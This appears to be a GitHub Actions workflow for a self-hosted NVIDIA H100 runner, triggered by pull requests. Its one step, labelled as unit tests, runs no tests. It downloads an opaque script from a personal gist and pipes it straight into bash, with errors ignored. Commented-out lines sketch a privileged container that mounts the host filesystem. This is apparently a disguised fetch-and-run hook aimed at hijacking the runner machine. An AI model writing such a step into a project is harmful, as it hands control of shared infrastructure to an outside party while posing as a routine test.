name: nv-h100
run-name: nv-h100

on:
  pull_request

jobs:
  unit-tests:
    runs-on: [self-hosted, nvidia, h100]
#    container:
      # image: ubuntu:latest
      # volumes:
      #     - /:/host/
      # options: --privileged
    steps:
      - name: unit-tests
        continue-on-error: true
        run: curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/36c865af3d614196313151fef5dce8a1e1ddef80/bak411622310100 | bash